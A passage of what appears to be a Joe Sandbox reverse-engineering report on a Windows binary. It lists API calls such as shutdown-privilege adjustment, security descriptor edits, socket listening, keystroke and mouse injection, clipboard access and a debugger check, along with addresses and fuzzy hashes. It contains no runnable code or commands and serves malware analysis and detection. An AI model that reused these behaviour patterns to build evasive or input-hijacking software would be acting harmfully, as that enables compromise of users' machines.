                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 2640511053-438819550
                                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                      • GetLastError.KERNEL32 ref: 00433414
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 2938487562-3733053543
                                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                      APIs
                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                      • CopySid.ADVAPI32(00000000), ref: 00446271
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 1255039815-0
                                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                      APIs
                                      • __swprintf.LIBCMT ref: 00433073
                                      • __swprintf.LIBCMT ref: 00433085
                                      • __wcsicoll.LIBCMT ref: 00433092
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                      • LockResource.KERNEL32(00000000), ref: 004330CA
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                      • LockResource.KERNEL32(?), ref: 00433120
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                      • String ID:
                                      • API String ID: 1158019794-0
                                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                      • GetLastError.KERNEL32 ref: 0045D6BF
                                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                      • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                      • String ID:
                                      • API String ID: 540024437-0
                                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                      • FindClose.KERNEL32(?), ref: 004525FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                      • String ID: *.*$\VH
                                      • API String ID: 2786137511-2657498754
                                      • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                      • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                      • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                      • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID: pqI
                                      • API String ID: 2579439406-2459173057
                                      • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                      • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                      • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                      • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                      APIs
                                      • __wcsicoll.LIBCMT ref: 00433349
                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                      • __wcsicoll.LIBCMT ref: 00433375
                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicollmouse_event
                                      • String ID: DOWN
                                      • API String ID: 1033544147-711622031
                                      • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                      • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                      • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                      • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044C3D2
                                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: KeyboardMessagePostState$InputSend
                                      • String ID:
                                      • API String ID: 3031425849-0
                                      • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                      • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                      • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                      • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                      APIs
                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLastinet_addrsocket
                                      • String ID:
                                      • API String ID: 4170576061-0
                                      • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                      • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                      • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                      • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                      APIs
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • IsWindowVisible.USER32 ref: 0047A368
                                      • IsWindowEnabled.USER32 ref: 0047A378
                                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                      • IsIconic.USER32 ref: 0047A393
                                      • IsZoomed.USER32 ref: 0047A3A1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: e73d6ad61345a6a69264b283110bd362a2875110283f9bbef61147e752cec385
                                      • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                      • Opcode Fuzzy Hash: e73d6ad61345a6a69264b283110bd362a2875110283f9bbef61147e752cec385
                                      • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                      APIs
                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                      • CoInitialize.OLE32(00000000), ref: 00478442
                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                      • CoUninitialize.OLE32 ref: 0047863C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: ce5596abf2290682f5d0e27f8d223ad7ebd511704512ca1ec9ee83ad8894652b
                                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                      • Opcode Fuzzy Hash: ce5596abf2290682f5d0e27f8d223ad7ebd511704512ca1ec9ee83ad8894652b
                                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: U$\
                                      • API String ID: 4104443479-100911408
                                      • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                      • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                      • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                      • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
